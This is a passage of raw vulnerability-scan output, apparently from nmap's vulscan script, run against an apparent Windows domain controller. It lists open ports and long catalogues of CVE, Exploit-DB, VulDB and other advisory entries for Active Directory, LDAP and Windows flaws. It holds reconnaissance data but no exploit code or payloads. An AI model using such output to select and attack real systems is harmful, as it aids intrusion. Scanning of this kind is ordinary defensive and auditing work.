sensitive information via unknown vectors. [CVE-2007-2999] Microsoft Windows Server 2003, when time restrictions are in effect for user accounts, generates different error messages for failed login attempts with a valid user name than for those with an invalid user name, which allows context-dependent attackers to determine valid Active Directory account names. [CVE-2005-3169] Microsoft Windows 2000 before Update Rollup 1 for SP4, when the "audit directory service access" policy is enabled, does not record a 565 event message for File Delete Child operations on an Active Directory object in the security event log, which could allow attackers to conduct unauthorized activities without detection. [CVE-2005-0545] Microsoft Windows XP Pro SP2 and Windows 2000 Server SP4 running Active Directory allow local users to bypass group policies that restrict access to hidden drives by using the browse feature in Office 10 applications such as Word or Excel, or using a flash drive. NOTE: this issue has been disputed in a followup post. [CVE-2003-0533] Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm. [CVE-2003-0507] Stack-based buffer overflow in Active Directory in Windows 2000 before SP4 allows remote attackers to cause a denial of service (reboot) and possibly execute arbitrary code via an LDAP version 3 search request with a large number of (1) "AND," (2) "OR," and possibly other statements, which causes LSASS.EXE to crash. [CVE-2002-2328] Active Directory in Windows 2000, when supporting Kerberos V authentication and GSSAPI, allows remote attackers to cause a denial of service (hang) via an LDAP client that sets the page length to zero during a large request. SecurityFocus - https://www.securityfocus.com/bid/: [31609] Microsoft Windows Active Directory LDAP Request Handling Remote Code Execution Vulnerability [29584] Microsoft Windows Active Directory LDAP Request Validation Remote Denial Of Service Vulnerability [27638] Microsoft Windows Active Directory LDAP Request Validation Remote Denial Of Service Vulnerability [24800] Microsoft Windows Active Directory LDAP Request Validation Remote Code Execution Vulnerability [24796] Microsoft Windows Active Directory LDAP Request Validation Remote Denial Of Service Vulnerability [97448] Microsoft Windows Active Directory CVE-2017-0164 Denial of Service Vulnerability [91118] Microsoft Windows Active Directory CVE-2016-3226 Denial of Service Vulnerability [90065] Microsoft Windows Kernel 'Win32k.sys' CVE-2016-0174 Local Privilege Escalation Vulnerability [62184] Microsoft Windows Active Directory CVE-2013-3868 Denial of Service Vulnerability [58848] Microsoft Windows Active Directory CVE-2013-1282 Denial of Service Vulnerability [50570] Microsoft Active Directory LDAPS Authentication Bypass Vulnerability [37215] Microsoft Windows Active Directory Single Sign On Authentication Spoofing Vulnerability [36918] Microsoft Active Directory LDAP Request Stack Exhaustion Denial Of Service Vulnerability [35226] Microsoft Active Directory Encoded LDAP String Memory Corruption Remote Code Execution Vulnerability [32305] Microsoft Active Directory LDAP Server Username Enumeration Weakness [8093] Microsoft Windows 2000 Active Directory Forest Origin Validation Vulnerability [7930] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [7330] Microsoft Windows Active Directory Policy Bypass Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [50761] Microsoft Windows Active Directory LDAP denial of service [50759] Microsoft Windows 2000 Active Directory LDAP code execution [45585] Microsoft Windows Active Directory LDAP search buffer overflow [42668] Microsoft Windows Active Directory LDAP request denial of service [40102] Microsoft Windows Active Directory LDAP request denial of service [35180] Microsoft Windows Active Directory LDAP denial of service [35179] Microsoft Windows Active Directory LDAP attribute buffer overflow [86072] Microsoft Windows Active Directory Federation Services information disclosure [71559] Microsoft Windows Active Directory buffer overflow [70950] Microsoft Windows Active Directory privilege escalation [67750] Microsoft Windows Active Directory Certificate Services Web Enrollment cross-site scripting [64915] Microsoft Windows Active Directory denial of service [54426] Microsoft Windows Active Directory Federation Services (ADFS) code execution [54425] Microsoft Windows Active Directory Federation Services (ADFS) spoofing [34634] Microsoft Windows Server 2003 Active Directory information disclosure [29737] Microsoft Active Directory maximum LDAP connections reached [12489] Microsoft Windows 2000 Server Active Directory buffer overflow Exploit-DB - https://www.exploit-db.com: [22782] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [30825] Microsoft Windows Media Digital Rights Management ActiveX Control Buffer Overflow Vulnerability [29630] Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability [20371] Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability [19731] microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal [11195] Microsoft Windows Defender ActiveX Heap Overflow PoC OpenVAS (Nessus) - http://www.openvas.org: [902487] Microsoft Windows Active Directory LDAPS Authentication Bypass Vulnerability (2630837) [902290] Microsoft Windows Active Directory SPN Denial of Service (2478953) [901048] Microsoft Windows Active Directory Denial of Service Vulnerability (973309) [900566] Microsoft Active Directory LDAP Remote Code Execution Vulnerability (969805) [801598] Microsoft Windows2k3 Active Directory 'BROWSER ELECTION' Buffer Overflow Vulnerability SecurityTracker - https://www.securitytracker.com: [1028405] Microsoft Active Directory LDAP Processing Flaw Lets Remote Users Deny Service [1021042] Microsoft Active Directory LDAP Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1020229] Microsoft Active Directory LDAP Validation Bug Lets Remote Users Deny Service [1018355] Windows Active Directory Bug in Processing LDAP Convertible Attributes Lets Remote Users Execute Arbitrary Code [1007093] Microsoft Active Directory Stack Overflow in 'Lsaas.exe' Lets Remote Users Crash the Windows 2000 Server [1028908] Microsoft Active Directory Federation Services Discloses Account Information to Remote Users [1026412] Microsoft Active Directory Memory Access Error Lets Remote Authenticated Users Execute Arbitrary Code [1026294] Microsoft Active Directory CRL Validation Flaw Lets Remote Users Bypass Authentication [1025653] Microsoft Active Directory Input Validation Flaw in Certificate Services Web Enrollment Permits Cross-Site Scripting Attacks [1025330] Microsoft WMITools and Windows Messenger ActiveX Controls Let Remote Users Execute Arbitrary Code [1025086] Microsoft Active Directory Heap Overflow in Processing BROWSER ELECTION Packets May Let Remote Users Execute Arbitrary Code [1025042] Microsoft Active Directory SPN Collosions May Let Remote Authenticated Users Deny Service [1023296] Microsoft Active Directory Federation Services Lets Remote Authenticated Users Execute Arbitrary Code and Spoof Web Sites [1023156] Microsoft Active Directory Stack Memory Consumption Flaw Lets Remote Users Deny Service [1022349] Microsoft Active Directory Bugs Let Remote Users Execute Arbitrary Code or Deny Service [1021369] Microsoft Visual Basic DataGrid/FlexGrid/Heirarchival FlexGrid/Windows Common/Charts ActiveX Controls Let Remote Users Execute Arbitrary Code [1020512] HP OpenView Select Identity Unspecified Flaw in Active Directory Bidirectional LDAP Connector Lets Remote Users Access the System [1019382] Active Directory LDAP Processing Bug Lets Remote Users Deny Service [1011233] WebLogic Active Directory LDAP Error May Fail to Disable User Accounts [1009767] Microsoft Windows 2000 Domain Controller LDAP Flaw May Let Remote Users Restart the Authentication Service [1007932] Microsoft Windows Troubleshooter ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1007905] Microsoft Windows Server 2003 Shell Folders Can Be Referenced Using Directory Traversal Characters [1005150] Microsoft Windows Operating System Certificate Enrollment ActiveX Control Allows Remote Users to Delete Certificates on a Target User's System [1004441] Microsoft Windows Help System Buffer Overflows in 'htctrl.ocx' ActiveX Control May Let Remote Users Execute Arbitrary Code on a Target User's Computer By Sending Malicious HTML [1004369] Microsoft Active Directory May Have Bug That Allows Remote Users to Crash the Directory [1003420] Microsoft Site Server Commerce Edition Discloses Potentially Sensitive Administration Information and Source Code to Remote Users With Valid Accounts and Discloses User Passwords from the LDAP Directory to Anonymous Remote Users [1003075] ActivePerl for Windows Discloses Directory Path Location to Remote Users [1001832] Microsoft Windows 2000 LDAP Server Lets Remote Users Gain Administrator Access to the Domain Controller When Configured to Support LDAP over SSL OSVDB - http://www.osvdb.org: [92126] Microsoft Windows Multiple Active Directory Components LDAP Crafted Query Handling Memory Consumption Remote DoS [76902] Microsoft Windows Active Directory LDAPS CRL Handling Weakness Authentication Bypass [60210] Microsoft Windows Active Directory Malformed LDAP Client Request Remote DoS [59856] Microsoft Windows Active Directory Malformed LDAP Request Stack Exhaustion Remote DoS [54938] Microsoft Windows Active Directory Crafted LDAP(S) Request Handling Remote DoS [54937] Microsoft Windows Active Directory Crafted LDAP(S) Request Hexdecimal DN AttributeValue Handling Arbitrary Code Execution [50000] Microsoft Windows Active Directory LDAP Server Bind Request User Account Enumeration [49058] Microsoft Windows Active Directory LDAP(S) Request Handling Remote Overflow [46066] Microsoft Windows Active Directory LDAP Request Processing Remote DoS [35961] Microsoft Windows Active Directory LDAP Service Crafted Request Remote DoS [35960] Microsoft Windows Active Directory LDAP Service Convertible Attribute Remote Code Execution [15379] Microsoft Windows ActiveDirectory LDAP Authentication Bypass [77667] Microsoft Windows Active Directory Query Parsing Remote Overflow [72937] Microsoft Windows Active Directory Certificate Services Web Enrollment XSS [72670] Microsoft Windows Server 2003 ActiveDirectory BROWSER ELECTION Remote Overflow [70825] Microsoft Windows Server Active Directory Server Principal Name (SPN) Handling Remote DoS [60836] Microsoft Windows Active Directory Federation Services (ADFS) Request Header Handling Remote Code Execution [60835] Microsoft Windows Active Directory Federation Services (ADFS) Single Sign-on Spoofing [41461] Microsoft Active Directory / ADAM Malformed LDAP Request Remote DoS [36138] Microsoft Windows Active Directory Time Restriction User Enumeration [30405] Microsoft Windows Active Directory Unspecified DoS [12655] Microsoft Windows Active Directory LSASS.EXE DoS [2237] Microsoft Windows 2000 Active Directory Lsass.exe Overflow [1297] Microsoft Windows 2000 Active Directory Object Attribute
445	tcp	open	microsoft-ds	syn-ack
464	tcp	open	kpasswd5	syn-ack
593	tcp	open	ncacn_http	syn-ack	Microsoft Windows RPC over HTTP	1.0
	vulscan	VulDB - https://vuldb.com: [174865] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 HTTP Protocol Stack unknown vulnerability [174843] Microsoft Windows 10 1809/Server 2019 Container Isolation FS Filter Driver unknown vulnerability [173895] Netgear R7000 1.0.11.116 HTTP Request backup.cgi heap-based overflow [169497] Microsoft Windows 10 Version 1809 for 32-bit Systems Codecs Library unknown vulnerability [167637] Microsoft Windows 8.1/10/10 1607/Server 2012 R2/Server 2016 Hyper-V denial of service [159509] Microsoft Windows 10 1909/10 2004 Codecs Library memory corruption [156303] Microsoft Windows 10 1709/10 1803/10 1809/10 1903/Server 2004 Feedback Hub privilege escalation [153235] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153228] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [151171] Microsoft Windows 10 1607/Server 2016 Graphics Component privilege escalation [151094] Microsoft Windows up to Server 1909 Defender privilege escalation [149962] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Hyper-V privilege escalation [149945] Microsoft Windows 10/10 1607/Server 2016 DirectX privilege escalation [149039] Microsoft Windows 10 1803/Server 2019 RDP Session Lockscreen weak authentication [148650] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Subsystem for Linux privilege escalation [148638] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Win32k privilege escalation [146874] Microsoft Windows 10 1809/Server 2019 Printer Service privilege escalation [145353] Microsoft Windows 10 1809/10 1903/Server 2019 Data Sharing Service privilege escalation [145341] Microsoft Windows 10 1903/Server 1903 Media Foundation memory corruption [143098] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client information disclosure [143097] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143088] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143076] Microsoft Windows 10 1703/10 1709/10 1803/Server 1803/Server 2019 Hyper-V privilege escalation [139935] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 NTFS privilege escalation [139912] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Hyper-V Network Switch privilege escalation [137538] Microsoft Windows Server 1803/Server 1903/Server 2016/Server 2019 ADFS Security Feature 7PK Security Features [136321] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Audio Service privilege escalation [136275] Microsoft Windows 10/10 1607/10 1703/10 1709/Server 2016 Hyper-V privilege escalation [133210] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 DirectX information disclosure [131650] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [131632] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131631] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131630] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [128722] Microsoft Windows 10 1803/Server 1803 DHCP Client memory corruption [128717] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [127881] Microsoft Windows 10 1809/Server 2019 memory corruption [127827] Microsoft Windows 10 1809/Server 2019 DirectX information disclosure [127826] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Win32k information disclosure [126733] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DirectX privilege escalation [125112] Microsoft Windows 10 1803/Server 1803 Subsystem for Linux privilege escalation [123867] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123866] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [122888] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Windows Shell privilege escalation [122826] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 PDF memory corruption [119471] Microsoft Windows 10 1803/Server 1803 Win32k privilege escalation [119466] Microsoft Windows 10 1709/Server 1709 Hyper-V privilege escalation [119453] Microsoft Windows 10 1709/10 1803/Server 1709/Server 1803 WebDAV privilege escalation [119450] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Kernel information disclosure [116020] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Active Directory 7PK Security Features [114565] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Kernel information disclosure [114534] Microsoft Windows 10/10 1511/10 1607/10 1703/10 1709 Scripting Host 7PK Security Features [114522] Microsoft Windows 10 1607/10 1703/Server 2016 Desktop Bridge privilege escalation [114520] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge privilege escalation [114517] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge VFS privilege escalation [113262] Microsoft Windows 10/Server 1709 Storage Services privilege escalation [113261] Microsoft Windows 10/Server 1709 Security Feature 7PK Security Features [113259] Microsoft Windows 10/Server 1709/Server 2016 NTFS privilege escalation [113258] Microsoft Windows 10/Server 1709 Kernel information disclosure [113253] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113251] Microsoft Windows 10/Server 1709 Kernel privilege escalation [113250] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113240] Microsoft Windows 10/Server 1709/Server 2016 AppContainer privilege escalation [113238] Microsoft Windows 10 1709/Server 1709 Named Pipe File System privilege escalation [105049] Microsoft Windows 10 1703 Remote Desktop Protocol Data Processing Error [105013] Microsoft Windows 10 1607/10 1703/Server 2016 Hyper-V privilege escalation [99683] Microsoft Windows 10 1607/10 1703/Server 2012 R2/Server 2016 Active Directory 7PK Security Features [82234] Microsoft Windows 10 HTTP.sys Data Processing Error [15764] Microsoft IIS 2.0/3.0/4.0/5.0/5.1 HTTP 1.0 Request IP Address information disclosure [597] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC over HTTP Reply denial of service [176520] Microsoft Windows 10 20H2 up to Server 2004 DWM Core Library unknown vulnerability [176515] Microsoft Windows 10 up to Server 2019 Hyper-V denial of service [176507] Microsoft Windows 10 20H2 up to Server 2019 Cloud Files Mini Filter Driver unknown vulnerability [176499] Microsoft Windows 10 20H2/10 21H1/10 2004/Server 20H2/Server 2004 Bind Filter Driver information disclosure [176494] Microsoft Windows 10 20H2 up to Server 2004 Kernel information disclosure [176491] Microsoft Windows 10 20H2 up to Server 2019 Kernel-Mode Driver unknown vulnerability [176490] Microsoft Windows 10 20H2 up to Server 2019 Kernel unknown vulnerability [174866] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174864] Microsoft Windows 10 20H2 up to Server 2019 Container Manager Service unknown vulnerability [174863] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174862] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174861] Microsoft Windows 10 20H2 up to Server 2019 Graphics unknown vulnerability [174847] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Desktop Bridge denial of service [174845] Microsoft Windows 10 20H2 up to 10 2004 WalletService unknown vulnerability [174842] Microsoft Windows 10 20H2 up to Server 2019 Projected File System FS Filter Driver information disclosure [174841] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Media Foundation Core unknown vulnerability [174835] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB Client Security Feature unknown vulnerability [172949] Microsoft Windows 10 up to Server 2019 Media Photo Codec information disclosure [172937] Microsoft Windows 10 20H2 up to Server 2019 Hyper-V denial of service [172933] Microsoft Windows 10 20H2 up to Server 2019 Application Compatibility Cache denial of service [172925] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP Driver denial of service [172920] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB information disclosure [172877] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP information disclosure [171929] Netgear R6400/R6700 1.0.4.98 upnpd stack-based overflow [171750] Rockwell Automation MicroLogix 1400 up to 21.6 ModBus Packet buffer overflow [171012] Microsoft Windows 10 20H2 up to Server 2019 NAT denial of service [171009] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V unknown vulnerability [170979] Microsoft Windows 10 20H2 up to Server 2019 OpenType Font Parser code injection [170907] Microsoft Windows 10 20H2 up to Server 2019 Application Virtualization code injection [169524] Microsoft Windows 10 20H2 up to Server 2019 Microsoft.PowerShell.Utility Module protection mechanism [169521] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Network File System denial of service [169498] Microsoft Windows 10 up to Server 2019 unknown vulnerability [169487] Microsoft Windows 10 up to Server 2019 Graphics unknown vulnerability [169020] Belkin Linksys WRT160NL 1.0.04.002_US_20130619 mini_httpd apply.cgi do_upgrade_post os command injection [168122] Backdoor.Win32.Whisper.b Service Port 113 C:\Windows\rundll32.exe stack-based overflow [167754] SAP Commerce Cloud 1808/1811/1905/2005/2011 HTTP Response cross site scripting [167700] Microsoft Windows 10 up to Server 2019 RDP authorization [167636] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V denial of service [167587] Delta Industrial Automation CNCSoft ScreenEditor up to 1.01.26 Project File stack-based overflow [167208] Backdoor.Win32.Infexor.b HTTP Service Port 13 kernel32.dll.exe buffer overflow [160903] Microsoft Windows 10 2004 Shell Infrastructure privilege escalation [160868] Microsoft Windows 10 2004/Server 2004 Projected Filesystem privilege escalation [159496] Microsoft Windows up to 10 2004 Codecs Library memory corruption [159113] Netgear R6700 1.0.4.84_10.0.58 httpd Service memory corruption [157988] Microsoft Windows 10 2004/Server 2004 Subsystem for Linux privilege escalation [157631] Nginx Controller up to 1.0.1/2.8.x/3.4.x Kubernetes Package Download HTTP weak encryption [156422] Microsoft Windows 10 2004/Server 2004 SMBv3 denial of service [156370] Microsoft Windows 10 2004/Server 2004 Connected User Experiences/Telemetry Service privilege escalation [152075] Microsoft Windows up to Server 2019 Type 1 Font Parser privilege escalation [149928] Microsoft Windows 10/Server 2016 DirectX privilege escalation [149713] Cisco Video Surveillance 8000 Series IP Camera up to 1.0.6 Discovery Protocol privilege escalation [121481] VelotiSmart WiFi B-380 Camera 1.0.0 uc-http Service directory traversal [119280] XiongMai uc-httpd 1.0.0 memory corruption [119066] charset up to 1.0.0 on Node.js DHTTP_MAX_HEADER_SIZE denial of service [114089] Moxa OnCell G3100-HSPA up to 1.4 Build 16062919 HTTP Request Data Processing Error [113243] Microsoft Windows 10/Server 2016 MultiPoint Management privilege escalation [110531] Microsoft Windows 10/Server 2016 Device Guard 7PK Security Features [110508] SAP HANA 1.0 HTTP/REST Endpoint Controller Log privilege escalation [109358] Microsoft .NET Framework 1.0/1.1/2.0 weak authentication [107753] Microsoft Windows 10/Server 2016 SMB Data Processing Error [107734] Microsoft Windows 10/Server 2016 SMB privilege escalation [103442] Microsoft Windows 10/Server 2016 HoloLens privilege escalation [101028] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [99667] Microsoft Windows 10/Server 2016 Active Directory Service Unresponsive privilege escalation [98272] Microsoft Windows up to 10/Server 2016 Local Session privilege escalation [98015] Microsoft Windows 10/Server 2016 Hyper-V privilege escalation [98013] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [98007] Microsoft Windows 10/Server 2016 Hyper-V Network Switch privilege escalation [98006] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [94436] Microsoft Windows 10 Graphics Data Processing Error [92595] Microsoft Windows 10 Diagnostics Hub privilege escalation [91560] Microsoft Windows 10 Object memory corruption [90712] Microsoft Windows 10/10 1511 Universal Outlook information disclosure [90375] Cisco NX-OS up to 5.2 on Nexus 1000V Discovery Protocol Packet denial of service [89623] Netwin Surgeldap 1.0 d HTTP Request Path information disclosure [89179] Jordan Windows Telnet 1.0/1.2 memory corruption [88065] Netgear D3600/D6000 up to 1.0.0.49 Key Recovery cgi-bin/passrec.asp Password privilege escalation [87952] Microsoft Windows 10/10 1511 Diagnostic Hub Data Processing Error [87946] Microsoft Windows 10 Kernel win32k.sys privilege escalation [81271] Microsoft Windows 10 PDF Library privilege escalation [80223] Microsoft Windows 10/1511 RDP Service 7PK Security Features [79515] Microsoft Windows 10 Kernel privilege escalation [75760] Microsoft Windows Media Player 10/11/12 DataObject Code [71152] clearhub Windows Live Hotmail PUSH mail 1.00.97 X.509 Certificate weak encryption [66827] Microsoft Windows Media Player 11.0.5721.5230 memory corruption [65884] FFmpeg 1.0/1.0.1 ff_ass_split_override_codes denial of service [65578] Gummy Bear FTP Drive + HTTP Server up to 1.0.4 directory traversal [58992] Microsoft .NET Framework 1.0 SP3/1.1 SP1/2.0 SP2/3.5.1/4 privilege escalation [56598] Microsoft Windows Azure Sdk up to 1.2 privilege escalation [53449] OpenSSL 1.0.0 EVP_PKEY_verify_recover privilege escalation [53437] Http-solution Project Man up to 1.0 Login login.php sql injection [53367] Microsoft .NET Framework 1.0 Default Configuration cross site scripting [52283] Microsoft Windows Media Player 11.0.5721.5145 memory corruption [49208] Joompolitan Com Livechat 1.0 HTTP Proxy xmlhttp.php privilege escalation [48705] TorrentTrader Classic 1.09 account-recover.php privilege escalation [47804] Microsoft Windows Media Player 11.0.5721.5260 Numeric Error [42328] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [42327] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [39937] Microsoft Windows Media Player 11 Numeric Error [38272] Microsoft Windows Media Player 11 wmplayer.exe denial of service [34043] Http explorer Http Explorer Web Server 1.02 directory traversal [33889] Microsoft Windows Media Player 10.00.00.4036 denial of service [29414] Microsoft .NET Framework 1.0/1.1 memory corruption [29005] Lighttpd 1.4.10 on Windows response.c information disclosure [27224] Microsoft Windows up to 1999 denial of service [24470] Sami HTTP Server 1.0.5 denial of service [24469] Sami HTTP Server 1.0.5 directory traversal [23215] Mbedthis AppWeb HTTP Server up to 1.0 information disclosure [23214] Mbedthis AppWeb HTTP Server up to 1.0.1 denial of service [23213] Mbedthis AppWeb HTTP Server up to 1.0.1 denial of service [22436] Karjasoft Sami HTTP Server 1.0.4 HTTP GET Request memory corruption [20553] Snowblind Web Server 1.0 HTTP Request memory corruption [20551] Snowblind Web Server 1.0 HTTP Request directory traversal [20550] Snowblind Web Server 1.0 HTTP Request directory traversal [19773] Perl-HTTPd 1.0/1.0.1 directory traversal [19671] Apache HTTP Server 1.3.20 on Windows /php/ privilege escalation [19636] Gamecheats Advanced Web Server Professional 1.030000 HTTP Request advserver.exe denial of service [19539] MyWebServer 1.0.0/1.0.1/1.0.2 HTTP Request memory corruption [19465] IBM HTTP Server 1.0 on AS400 JSP Request Path information disclosure [18990] Aprelium Technologies Abyss Web Server 1.0.3 HTTP Request Directory information disclosure [18988] Ipswitch IMail up to 7.1 HTTP 1.0 Request memory corruption [18949] Omnicron OmniHTTPD 2.09 HTTP 1.0 Request denial of service [18946] Key Focus KF Web Server up to 1.0.5 HTTP Header memory corruption [18945] Key Focus KF Web Server 1.0.2 HTTP Request File information disclosure [18917] MyWebServer 1.0.1/1.0.2 HTTP GET Request memory corruption [18449] Microsoft .NET Framework 1.0 orderdetails.aspx information disclosure [18220] Bbshareware.com Phusion Webserver 1.0 HTTP Request memory corruption [17990] Plesk Server Administrator 1.0 HTTP Request Encoding privilege escalation [16982] McAfee ASaP Virusscan 1.0 HTTP Request directory traversal [16651] A1 HTTP Server 1.0a GET Request directory traversal [16650] A1 HTTP Server 1.0a HTTP Request memory corruption [15969] Fastream FUR HTTP Server 1.0b GET Request denial of service [15608] Apache HTTP Server up to 1.3.6.2 on Windows Directory information disclosure [14683] Apple Mac OS X 1.0 Apache HTTP Server denial of service [13812] Microsoft IIS 1.0/2.0/3.0 ASP Code privilege escalation [13725] Microsoft IIS 1.0 cmd privilege escalation [13018] Red Hat JBoss 1.0/6.0 Overlord Runtime Governance for JBossAS privilege escalation [12711] Microsoft Windows Media Player 11.0.5721.5230 WAV File memory corruption [11407] TP-LINK TL-WR740N 3.12.11 Build 120320 Rel.51047n HTTP Server denial of service [10645] Http-body Project Perl 1.08 Temp File Name HTTP::Body::Multipart privilege escalation [8509] D-Link DIR-300 1.05 HTTP Header tools_vct.xgi race condition [6926] Microsoft .NET Framework 1.0 SP3/1.1 SP1/2.0 SP2/3.5.1/4 Object Permission Handller privilege escalation [5729] Oracle E-Business Suite 11.5.10.2 on Oracle9i Application Server 1.0.2.2 HTTP Server privilege escalation [5726] Oracle E-Business Suite 11.5.10.2 on Oracle9i Application Server 1.0.2.2 HTTP Server privilege escalation [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c denial of service [2724] Microsoft Windows up to 10 Media Player memory corruption [2611] Apache HTTP Server up to 1.0.1 set_var Format String [2054] Microsoft Windows up to 10 Media Player memory corruption MITRE CVE - https://cve.mitre.org: [CVE-2013-0002] Buffer overflow in the Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages improper counting of objects during a memory copy operation, aka "WinForms Buffer Overflow Vulnerability." [CVE-2009-3126] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Integer Overflow Vulnerability." [CVE-2009-2504] Multiple integer overflows in unspecified APIs in GDI+ in Microsoft .NET Framework 1.1 SP1, .NET Framework 2.0 SP1 and SP2, Windows XP SP2 and SP3, Windows Server 2003 SP2, Vista Gold and SP1, Server 2008 Gold, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allow remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "GDI+ .NET API Vulnerability." [CVE-2009-2502] Buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted TIFF image file, aka "GDI+ TIFF Buffer Overflow Vulnerability." [CVE-2009-2501] Heap-based buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 